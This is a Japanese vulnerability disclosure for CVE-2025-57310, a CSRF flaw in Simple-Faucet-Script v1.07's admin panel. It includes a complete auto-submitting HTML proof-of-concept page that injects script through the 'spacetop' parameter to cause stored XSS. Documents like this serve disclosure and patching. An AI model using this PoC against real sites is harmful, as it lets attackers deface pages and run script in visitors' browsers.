
CVE-2025-57310の概念実証エクスプロイト: Simple-Faucet-Script v1.07におけるCSRF脆弱性。管理パネルへの細工されたPOSTリクエストを介して保存型XSSを可能にします。
Salmen2/Simple-Faucet-Script v1.07 には、admin.php?p=ads&c=1 への細工された POST リクエストを介したクロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在し、攻撃者による任意のコード実行を可能にします。
CWE-352: クロスサイトリクエストフォージェリ (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
本製品は管理パネルにおいてクロスサイトリクエストフォージェリ (CSRF) の影響を受けます。認証された管理者が PoC を含む悪意のあるページにアクセスすると、CSRF 攻撃によりトップページの内容が不正に変更されます。
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
攻撃者は spacetop パラメータを介して任意の HTML/JavaScript をトップページに注入でき、Stored クロスサイトスクリプティング (XSS) を引き起こします。